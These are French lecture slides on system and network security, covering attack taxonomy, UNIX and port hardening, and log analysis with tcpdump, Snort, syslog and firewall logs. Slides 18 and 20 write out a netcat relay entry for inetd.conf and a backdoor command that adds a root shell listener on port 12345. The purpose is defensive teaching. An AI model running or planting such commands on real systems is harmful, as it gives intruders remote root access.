Sécurité des systèmes et des réseaux - Taxonomie & Analyse des Logs

Page 1 sur 89Lecteur de document UniversityLib

Sécurité des systèmes et des réseaux - Taxonomie & Analyse des Logs

Computer Security and Networking · notes

Voir tous les documents en réseaux

Sécurité des systèmes

et des réseaux

  • Taxonomie & Analyse des Logs -

Abderrazak JEMAI

Professeur en informatique INSAT

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

1

Plan

 Taxonomie de la sécurité

 Sécurisation des systèmes d’exploitation : Cas du

système UNIX

 Sécurisation des ports et des services : Well known ports

 Analyse de logs : IDS, Firewalls, Syslog

 Formats des logs

 Méthodologie d’analyse des logs

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

2

Architectures réseaux et

Solutions de Sécurité

Entreprise A

LAN Privé

Collaborateur

Internet

Zone pub

Client

Serveur ftp

Serveur Web

Employé

distant

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

3

Menaces et

Solutions de Sécurité

Entreprise A

Collaborateur

LAN Privé

Services

Firewall

Internet

Données

DMZ

Serveur ftp

Serveur Web

Client

Hacker

Employé

distant

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

4

Mesures et Réponses

Entreprise A

Collaborateur

LAN Privé

Services

Firewall

Internet

Données

S

e

r

v

e

r

P

r

o

x

y

DMZ

Serveur ftp

Serveur Web

Client

Hacker

Employé

distant

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

5

Mesures et Réponses

Entreprise A

Collaborateur

LAN Privé

Services

Firewall

I

D

S

Données

S

e

r

v

e

r

P

r

o

x

y

Internet

DMZ

Serveur ftp

Serveur Web

Client

Hacker

Employé

distant

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

6

Mesures et Réponses

Entreprise A

Qui a servi ?

Services

LAN Privé

Quelle donnée a

été échangée ?

Quelles sont les

tentatives ?

Firewall

Collaborateur

Internet

I

D

S

Données

S

e

r

v

e

r

P

r

o

x

y

DMZ

Serveur ftp

Serveur Web

Client

Hacker

Employé

distant

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

7

Composantes de la sécurité

 Un attaquant cherche à compromettre l’une de ces trois

composantes

 Confidentialité (Consultation illégitime des données)

 Intégrité (Modification frauduleuse)

 Disponibilité (Services, Données)

 Un administrateur de sécurité doit veiller sur ces trois

composantes :

 Mesures préventives (Sauvegardes, Traces, HACMP)

 Détection (IDS, Analyse des logs)

 Réaction (Restauration, Architecture de secours)

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

8

Classification des attaques

 Selon sa gravité, une attaque peut être classée de type:

 Probing/Collection(ping, port scanning, ingénierie sociale, etc.).

 R2L Remote to Local/Connexion (rlogin, etc.)

 U2R User to Root/Pouvoir (su, buffer overflow, etc.)

 DoS/Exploitation (rm *, kill, halt, etc.)

 Un administrateur doit maitriser l’attaque :

 But de l’attaquant (Confidentialité, Intégrité, Disponibilité)

 Gravité (Probing, R2L, U2R, DoS)

 Acteurs (Users, Data, Process, Network, Procédures)

 Méthode (scénarios de l’attaque)

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

9

L’attaque et ses acteurs

Services

Données

Menaces

Firewall, IDS,

Proxy, Logs

VULNERABILITES

ATTAQUES

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

10

60 types of SIS

Disponibilté

Intégrité

Confidentialité

A

C

T

E

U

R

S

Méthode/Attack Model

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

11

Repérer les menaces et limiter les

effets des attaques…

 Mener périodiquement des actions d’audit de sécurité

 Audit organisationnelle

 Audit technique

 Repérer les vulnérabilités des systèmes d’exploitation et

renforcer leur sécurité.

 Sécuriser les ports et services

 Analyser périodiquement les logs : corrélation

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

12

Sécurité des Systèmes

  • Cas de UNIX -

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

13

Le système de fichiers

dev

bin

etc

mnt

home

tmp

usr

var

passwd

group

bin

man

spool

log

lp mail

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

14

Noyau et processus

Publicité

ksh

Processus 1

Processus 2

Processus N

Matériel : disques,

mémoire, cartes

interfaces, etc.)

bash

Noyau

sh

csh

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

15

Mécanisme de démarrage d’UNIX

Démarrage

init

/etc/inittab

NFS

crond

inetd

lpd

login

/etc/passwd

Processus

système :

démons

ksh

Écouter aux commandes

de l’utilisateur

cat

vi

netcat

Processus

utilisateur

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

16

/etc/inetd.conf

telnet

stream tcp

nowait

root

/usr/sbin/in.telnetdin.telnetd

ftp

stream tcp

nowait

root

/usr/sbin/in.ftpd

in.ftpd

 Nom du service : (ex telnet)

 Type de socket : type de connection (stream, dgram, raw, etc.).

 Protocole : tcp ou udp

 Etat : nowait, créer un processus pour chaque requête.

 Propriétaire : le service aura les permissions du propriétaire.

 Programme : nom du programme à lancer

 Arguments : Les arguments associés au lancement du programme.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

17

Attaques sur /etc/inetd.conf

Traffic Relaying

Relay A

Output-to-input

Ecouteur netcat

victime

Client netcat

Hacker

Relay B

Output-to-input

 Configuration de /etc/inetd.conf :

11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.28 54321

 Écouter sur le port 11111 et rediriger vers la machine 192.168.123.28

sur son port 54321

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

18

Init et inetd

init

n

e

t

n

e

t

u

o

c

E

e

c

n

e

n

a

m

r

e

p

httpd

sendmail

inetd

ftpd

telnetd

tftpd

Lancement à la

demande par

inetd

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

19

Attaques sur inetd :

Backdoor

/bin/sh –c " echo 12345 stream tcp nowait

root /bin/sh sh –i " >> /etc/inetd.conf;

killall –HUP inetd

 Rajouter un écouteur sur le port 12345 qui exécute

toute commande reçue sur le port d’entrée.

 Demander à inetd de relire son fichier de configuration.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

20

Sécurisation d’UNIX

 Contrôle d’accès : Unix trust, Kerberos, NIS, rlogin

 Intégrité : Mettre sous contrôle de TRIPWIRE

 Les ports /etc/services

 Les fichier de configuration /etc/*.conf

 Services réseaux /etc/inetd.conf

 Disponibilté : init, cron, filesystem, ps

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

21

Sécurité

des ports et des

services

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

22

Les ports et services associés

 Ports : voies de communication d’un système avec les autres systèmes.

 Les ports sont définis au niveau de la couche transport pour interfacer la couche

session (couche 5).

 A chaque numéro de port est associé un ou plusieurs services (TCP, UDP,

ICMP).

 Les ports conventionnels [1..1023] sont souvent des ports serveurs.

 Les ports non conventionnels [1024..65000] sont souvent des ports desquels

sortent les requêtes clients.

 Les ports sont définis sous Unix dans /etc/services.

 Connexion TCP :

 three-way handshake

 Service orienté connexion

 Service fiable

 UDP

 Best-effort data transfert

 Service datagram non connecté.

23

(c) A.JEMAI - Séc SysExp-

Réseaux-Analyse des Logs -

2020

Ports et Services

 Port 7 : echo

 Port 11 : systat

 Port 15 : netstat

 Port 19 : chargen

 Port 21 : ftp

 Port 23 : telnet

 Port 25 : SMTP

 Port 53 : domain

 Port 67 : bootp

 Port 69 : tftp

 Port 79 : finger

 Port 80 : http

 Port 109 : pop 2

 Port 110 : pop 3

 Port 111 : portmap

 Port 135 loc-serv

 Port 137 : nbname

 Port 138 : nbdatagram

 Port 139 : nbsesion

 Port 161 : SNMP

 Port 512 : excec

 Port 513 : login

 Port 514 : shell

 Port 514 : syslog

 Port 517 : talk

 Port 518 : ntalk

 Port 520 : route

 Port 540 : uucp

(c) A.JEMAI - Séc SysExp-

Réseaux-Analyse des Logs -

2020

24

Sécurisation du Port 7

Echo

 Les systèmes actuels n’ont pas besoin de ce service.

 Utilisé pour tester la connexion (ping).

 Peut être utilisé pour causer un dénis de service DoS (Denial of Service).

 Il faut le désactiver :

 Unix :

 vi /etc/inetd.conf

 Rajouter un # en debut de l’entrée « echo »

 Redémarrer le système

 Windows

 Exécuter « Regedit.exe »

 Affecter la valeur « false » ou « 0 » à l’entrée « echo »

 Redémarrer le système

25

(c) A.JEMAI - Séc SysExp-

Réseaux-Analyse des Logs -

2020

Sécurité

Informatique

Analyse des Logs

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

26

Lecture des fichiers logs

 Ce module décrit les formats des logs suivants :

 TCPdump

 Snort

 Les ACLs des produits Cisco

 Syslog

 Firewalls

 A la fin de ce module vous serez en mesure de

 Faire une bonne interprétation des fichiers log

 Identifier la source des données

 Mesurer l’importance de l’information

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

27

Format du sniffer TCPdump

 Origine : Créé par Network Research Group à

Laurence Berkeley National Lab.

 Objectif : lecture et analyse du trafic réseaux

 Plateforme : Linux

 Exemple de log :

11:53:46.105006 eth0 > 192.152.100.12.1234 >

193.142.10.8.www: s 6350050: 6350050(0) win 8192

< mss 1460,nop,nop,sackOK>(DF)

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

28

Publicité

TCPdump : format du log

11:53:46.105006 eth0 > 192.152.100.12.1234 >

Temps

Interface

Adresse source

193.142.10.8.www: s 6350050: 6350050(0) win

Adresse destination

Sequence Number

8192 < mss 1460,nop,nop,sackOK>(DF)

Options

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

29

Les outils de détection d’intrusion

IDS

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

30

Snort

 Origine : Créé par Martin Roesch. freeware

 Objectif : C’est un IDS : Système de Détection

d’Intrusion

 Plateforme : Unix (Linux) et Windows

 Exemple de log :

[] IDS024 –RPC- portmap-request-ttdbserv []

07/27-13:45:51.312456 10.0.0.60:800 -> 192.168.10.120:111

UDP TTL:64 TOS: 0x0 ID:33481

Len: 64

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

31

Snort : format du log

[] IDS024 –RPC- portmap-request-ttdbserv []

Nom de l’Alerte

07/27-13:45:51.312456 10.0.0.60:800 -> 192.168.10.120:111

Temps

Source

Direction du trafic

Destination

UDP TTL:64 TOS: 0x0 ID:33481 Len: 64

Type de protocole

Session ID

Time to Live

Type Of Service

Longueur

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

32

Snort

 [**] : caractéristique de Snort

 Format très similaire à TCPdump

 Snort peut délivrer le code en hexa du paquet

 Capture d’un paquet TCP avec snort

[] rwwwshell CGI access attempt []

06/10-07:55:01.282456 10.0.0.60:1526 -> 192.168.10.120:80 TCP TTL:52

TOS: 0x0 ID:4816 DF PA

Seq: 0xF3512C9 Ack: 0x9b3254 Win:7D78

47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 72 77 77 GET /cgi-su…

77 73 68 65 6C 6C 2E 70 …

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

33

Syslog

 Définition : c’est le démon de log système

 Lieu de stockage : /var/log

 Plusieurs outils de sécurité délivre leurs reports à syslog

 Extrait de log délivré par le firewall portsentry :

Jun 4 04:50:12 degiserv abacus sentry [105112] :attackalert:

Date et temps

hostname

Outils d’alerte

External command run for host 213.26.142.2

Description de l’alerte

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

34

Syslog (suite)

 Syslog peut être utilisé pour suivre :

 telnet

 rlogin

 ftp

 rsh

 La façon dont syslogd génère les messages se configure

en éditant le fichier de configuration /etc/syslogd.conf.

 Pour voir la dernière trace :

tail –f /var/adm/messages

May 23 09:30:00 ARCH inetd[1000]:telnet[1020] from

192.168.1.24 40000

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

35

Les formats des logs des

Firewalls

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

36

Firewall Cisco ACL

Routeur & filtre

 Origine : Cisco

 Objectif : C’est un firewall IP filter

 Exemple de log :

Feb 1 13:45:51 rt1 11542 08:00:42

Date &Time

HostName

Seq. Num.

Heure GMT

List 102 denied icmp 192.168.0.200 -> 192.168.13.122

ACL

IP source

IP destination

(8/0), 5 paquets

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

37

Méthodologie d’analyse

des logs

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

38

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

39

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Il s’agit de collecter la ou les traces qui ont attiré votre attention à fin de

les analyser de près.

 Déterminer la source de la trace et connaître par conséquents les

règles de filtrage.

 Snort IDS, : règles sont mises à jours chaque semaine (version du filtre).

 Shadow,

 PIX Firewall

 Etc.

 Probabilité que l’adresse IP source a été spoofée.

 Les attaques qui causent des DOS sont souvent suite à des IP spoofées.

 Les attaques de type « Smurf » et « ICMP broadcast » sont souvent suite à

des IP spoofées.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

40

Etapes d’analyse des logs

  • Effet de tierce partie -

 C’est le cas ou quelqu’un utilise votre adresse pour attaquer une

victime.

 Exemple : TCPdump « flood attacks »

 L’agresseur se déguise via plusieurs adresse IP différentes pour attaquer la

victime « plusieurs SYN en même temps »

 02:58:01 victime.dom.com > 171.30.67.23.2348 :

R:0:0(0) ack 6747198802 win 0

 02:58:11 victime.dom.com > 171.32.07.21.1408 :

R:0:0(0) ack 6747198802 win 0

 Le numéro de séquence 6747198801 caractérise une attaque « flood » bien

connue.

 Pour tester si un paquet est spoofé, utilisez Despoof.

 Despoof est un utilitaire sous Unix (Linux Bsd) se basant sur le TTL :

http://razor.bindview.com/tools

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

41

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

42

Etapes d’analyse des logs

  • Description de l’attaque -

 Plusieurs attaques peuvent être identifiées.

 La réponse répétitive à un numéro de séquence 6747198801 dénote une

attaque de type « flood attack »

 Un paquet SYN/FIN envoyé du port 109 au port 109 identifie une attaque

sur le port POP2.

 Un paquet SYN/FIN envoyé du port 53 au port 53 identifie une attaque sur

le port DNS et surnommée par « ADM buffer overflow against DNS ».

 Une attaque sur le port 5135/udp vise le service SGI (démon qui permet la

création des comptes sur IRIX).

 Liste d’attaques identifiées :

 http://www.sans.org : attaques identifiées.

 Xforce http://www.iss.net/xforce : vulnérabilité

 Bindview http://www.bindview.com : vulnérabilité

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

43

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse

DNS query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

44

Etapes d’analyse des logs

  • Mécanisme de l’attaque -

 Il s’agit de développer un ou plusieurs scénarios

d’attaques.

 Quatre questions de base :

 Est-ce le paquet est un stimulus ou une réponse ?

 Quel service est en train d’être ciblé ?

 Est-ce le service dispose de vulnérabilités connues ?

 Est-ce cette attaque est

 Bénigne

 De type reconnaissance

 De type DOS (Denial Of Service)

 Exploitation

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

45

Exemple :

Mécanisme de l’attaque

 Analyser le type d’attaque provenant du paquet :

[] … []

04/21-17:05:12.45712 someone.dom.com:2140->

Publicité

me.at.home: 60000 UDP TTL:50 TOS:0x0 ID2320 Len:10

 Il s’agit d’une attaque qui dialogue avec le cheval de troie

 Deep Throat ou

 SubSeven

 Pourquoi ?

 Deep Throat ou Sub Seven s’installe souvent sur le port 60000 UDP

 Un paquet UDP d’une taille assez petite (10) est signe d’un paquet non

ordinaire.

 Comment ?

 Ce paquet est un stimulus pour vérifier si un service est installé sur le port

60000.

 Le service est Deep Throat ou Sub Seven.

 L’agresseur tente de scanner plusieurs adresses dans l’espoir de trouver ce

torjan.

 Il s’agit d’une reconnaissance si l’agresseur tente plusieurs adresses.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

46

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

47

Etapes d’analyse des logs

  • Corrélation -

 Il s’agit de corréler cette attaque avec d’autres

attaques semblables.

 Liste des sites qui exposent les attaques :

 GIAC (Global Insident Analysis Center)

www.sans.org

 Ouvrages :

 Networks Intrusion Detection

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

48

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

49

Etapes d’analyse des logs

  • Evidence d’être ciblé -

 Il s’agit de se poser deux questions principales :

 Est-ce qu’il s’agit de simples paquets envoyés ?

 Est-ce qu’ils nous ciblent réellement ?

 Est-ce qu’ils ciblent un poste particulier ? Donc une

reconnaissance préalable a eu lieu.

 Est-ce qu’il s’agit d’un scan général de tout le réseau ?

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

50

Evidence d’être ciblé

Exemples

Exemple 1 :

21:03:12.65 badgay.com.265500 >

deskttophost.com.5135: udp 52

 5135 dénote le démon SGI object server

 Si «deskttophost.com» est une machine SGI-IRIX, on peut conclure que c’est une

attaque ciblée.

Exemple 2 :

21:03:12.6005 badgay.com.1005 >

goodgay.com.53?version.version.(30)

 L’agresseur cible le serveur DNS.

 Il souhaite connaître la version du BIND pour exploiter ses failles.

 Auparavant un travail de reconnaissance a été réalisé.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

51

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

52

Etapes d’analyse des logs

  • Sévérité -

Sévérité = (Criticalité + Gravité) –(Défense Système +

Défense Réseau)

 Il s’agit d’attribuer une note entre [-10 … +10] pour caractériser

l’attaque.

 Criticalité (Criticality ) : Importance de la ressource attaquée.

 Gravité (Leathality) : Degré d’agressivité de l’attaquant.

 Défense Système (System Countermeasures ) : Moyens mis dans le

système pour se défendre.

 Défense Réseau (Network Countermeasures) : Moyens mis en

réseau (firewall) pour protéger les ressources.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

53

Etapes d’analyse des logs

 Délimiter les traces à analyser

 Déterminer la source de la trace (ex : snort)

 Probabilité que l’adresse IP source a été spoofée.

 Description de l’attaque : (quoi ?). Exemple : L’agresseur

voudrait connaître la version du BIND.

 Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS

query.

 Corrélation : référer avec des attaques enregistrées

(www.sans.org).

 Evidence d’être ciblé

 Sévérité de l’attaque

 Recommandations

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

54

Etapes d’analyse des logs

  • Recommandations -

 Ce sont des recommandations données par

l’analyste pour mieux résister au futur attaques.

 L’urgence à mettre en application ces

recommandations dépendent de la valeur de la

sévérité calculée.

 Si (sévérité > 0) alors il y a urgence.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

55

Conclusion

 Les logs proviennent de trois sources:

 Qui sert les hackers (Syslogd)

 Qu’est ce que qui a été échangé fraudileusement

(IDS et sniffers : snort, tcpdump)

 Préparation des attaques et Politique de sécurité

(Firewalls)

 Corrélation entre les logs est indispensable

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

56

Bibligraphie

 Aurobindo Sundaram « An Introduction to

Intrusion Detection » 1996.

 Stephen Nothcutt « Intrusion Signature and

Analysis » New Readers Edition.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

57

Etapes d’analyse des logs

  • Exemple complet -

Snort.

[] MISC-DNS-version-query []

08/12-22:26:16.457900 SCANNER.OTHER.NET:1132 -> DNS_SERVER.MY.NET:53 UDP

TTL:64 TOS:0x0 ID48362 Len 38

[] IDS212 – MISC – DNS Zone transfert []

08/12-22:26:17.457930 SCANNER.OTHER.NET:1132 -> DNS_SERVER.MY.NET:53 TCP

TTL:64 TOS:0x0 ID48366 DF PA Seq 0x7663C408 ack:0x8DADD372 Win:

0x4470

TCPDump.

22:26:16.450008 SCANNER.OTHER.NET.1132 > DNS_SERVER.MY.NET.domain: 12329

inv_q+ [b2&3=0x980] A? . (27) (ttl 64, id 48361)

22:26:16.450100 DNS_SERVER.MY.NET.domain > SCANNER.OTHER.NET.1132 12329

inv_q+ q: [4.3.2.1]. 1/0/0 . (42) (ttl 64, id 45177)

Syslog.

Aug 12 22:26:15 DNS_SERVER named [19779]: XX /DNS_SERVER/DNS_SERVER/-A

Aug 12 22:26:15 DNS_SERVER named [19779]: XX

/DNS_SERVER/version_bind/TXT

Aug 12 22:26:16 DNS_SERVER named approved AXFR from

[SCANNER.OTHER.NET].1200 for « MY.NET »

Aug 12 22:26:16 DNS_SERVER named [19779]: XX /DNS_SERVER/MY.NET/AWFR

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

58

Exemple complet

 Source : Snort & TCPdump

 Probabilité que l’adresse a été spoofée : faible car le

transfert TCP de zones se fait sous haute

confidence.

 Description de l’attaque : L’agresseur essaye de connaître

la version du BIND et demande un transfert de

zone. C’est une opération de reconnaissance.

 Mécanisme d’attaque : L’agresseur envoie une requête

inversée DNS pour déterminer la version du BIND.

La demande de zone lui permet aussi de collecter

les adresses des hosts du réseau.

 Corrélation : Les attaques « Buffer overflow » contre

le DNS sont connus dans

http://www.sans.org/topten.html {cve 0849, 0848}.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

59

Exemple complet (suite)

 Evidence d’être ciblé : Nous sommes bien ciblé et une

attaque par buffer overflow contre notre serveur

DNS est très probable très prochainement.

 Sévérité :

 Criticalité = 5 : le serveur DNS est une ressource

critique.

 Gravité = 2: c’est encore en phase de reconnaissance.

 Mesures système = 4 : un nouveau OS avec des patches et

des outils de sécurité additionnels.

 Mesures réseau = 1 : peu de protections du firewall.

 Sévérité = (5+2)-(4+1) = 2

 Recommandations :

 Rajouter des règles qui interdisent les requêtes

demandant les versions du BIND.

 Voir le site www.psionic.com/papers/dns

 Interdire le transfert de zones en dehors du LAN.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

60

QCM

Publicité

Aug 12 22:14:12 DNS_SERVER named [19779]: XX

/DNS_SERVER/DNS_SERVER/-A

Aug 12 22:14:12 DNS_SERVER named [19779]: XX

/DNS_SERVER/version.bind/TXT

Aug 12 22:14:13 DNS_SERVER named [19779]:

approved AXFR from [SCANNER.OTHER.NET].1200 for «

MY.NET »

Aug 12 22:14:13 DNS_SERVER named [19779]: XX

/DNS_SERVER/MY.NET/AXFR

Indiquer la bonne suggestion :

A. SCANNER.OTHER.NET a attaqué avec succès le cache du serveur

DNS

B. SCANNER.OTHER.NET tente une attaque remote buffer overflow

contre le serveur DNS

C. C’est normal de demander la version du BIND avant de demander un

AXFR.

D. SCANNER.OTHER.NET demande un transfert de zone et est

approuvée.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

61

Réponse au QCM

 Réponse D

 Séquence de l’opération :

1. Named envoie une requête de type A

2. Le serveur DNS délivre la version du BIND.

3. Le serveur DNS approuve AXFR au

SCANNER.OTHER.NET

4. Transfert de zone effectué

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

62

Logs des Firewalls

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

63

Firewall

 Comparés aux IDS les Firewalls délivrent peu

d’information.

 Les firewalls délivrent principalement :

 Le temps d’apparition du paquet

 Port et adresse IP source

 Port et adresse IP destination

 Protocole (IP, UDP, ICMP)

 Action (permit, deny)

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

64

Routeurs CISCO

Mar 31 02:52:42 rt1 1440: 10:34:19: %SEC-6-

IPACCESSLOGDP: List 102 denied icmp 209.67.78.202 ->

external.primary.dns (8/0), 2 packets

Mar 31 08:09:37 rt1 2264: 15:34:19: %SEC-6-

IPACCESSLOGDP: List 102 denied icmp 209.67.78.202 ->

external.primary.dns (8/0), 1 packet

Mar 31 08:09:57 rt1 2265: 15:51:19: %SEC-6-

IPACCESSLOGP: List 102 denied tcp 209.67.78.202(2100)

-> external.primary.dns (53), 1 packet

Mar 31 08:54:23 rt1 2397: 16:34:19: %SEC-6-

IPACCESSLOGP: List 102 denied udp 209.67.78.202(3408)

-> external.primary.dns (33434), 1 packet

Mar 31 13:52:42 rt1 3319: 21:34:19: %SEC-6-

IPACCESSLOGP: List 102 denied udp 209.67.78.202(3408)

-> external.primary.dns (33434), 1 packet

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

65

Routeur CISCO

Analyse du log

 Source : CISCO ACL logs

 Probabilité que l’adresse a été spoofée : faible.

 Description de l’attaque : C’est une attaque de

reconnaissance sur le serveur DNS.

 Mécanisme d’attaque :

 L’agresseur envoie une requête ping sur le

serveur DNS pour savoir s’il est en ligne.

 Ensuite l’agresseur demande un transfert de

zone.

 Corrélation : Les attaques de reconnaissance

sont décrites dans « Network Intrusion and

Analysis » www.sans.org .

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

66

Exemple complet (suite)

 Evidence d’être ciblé : C’est une attaque qui vise

le serveur DNS particulièrement.

 Sévérité :

 Criticalité = 5 : le serveur DNS est une ressource

critique.

 Gravité = 2 : c’est encore en phase de

reconnaissance.

 Mesures système = 5 : un nouveau OS avec des

patches et des outils de sécurité additionnels.

 Mesures réseau = 5 : Très bonne protection réseau.

 Sévérité = (5+2)-(5+5) = -3

 Recommandations :

 La défense est bonne

 Le routeur ACL bloque l’attaque.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

67

QCM

 Comment vous caractérisez l’attaque :

A. Port scan

B. Attaque Teardrop

C. Scan pour transfert de zone

D. Buffer overflow

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

68

Réponse au QCM

 Réponse C

 Séquence de l’opération :

2.

1. Requêtes ICMP, donc demande d’information

3ème ligne indique un rejet de requête au port

53/tcp sur le serveur DNS qui est associé à une

transfert de zone

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

69

Firewall 1 de Check Point

19-May-00 02:52:42 drop inbound udp

scan.wins.guy MY.NET.29.8 netbios-ns netbios-ns

78

19-May-00 02:53:02 drop inbound udp

scan.wins.guy MY.NET.29.9 netbios-ns netbios-ns

78

19-May-00 02:53:22 drop inbound udp

scan.wins.guy MY.NET.29.10 netbios-ns netbios-ns

78

19-May-00 18:15:18 drop inbound udp

scan.wins.guy MY.NET.29.252 netbios-ns netbios-

ns 78

19-May-00 18:15:29 drop inbound udp

scan.wins.guy MY.NET.29.253 netbios-ns netbios-

ns 78

19-May-00 18:15:39 drop inbound udp

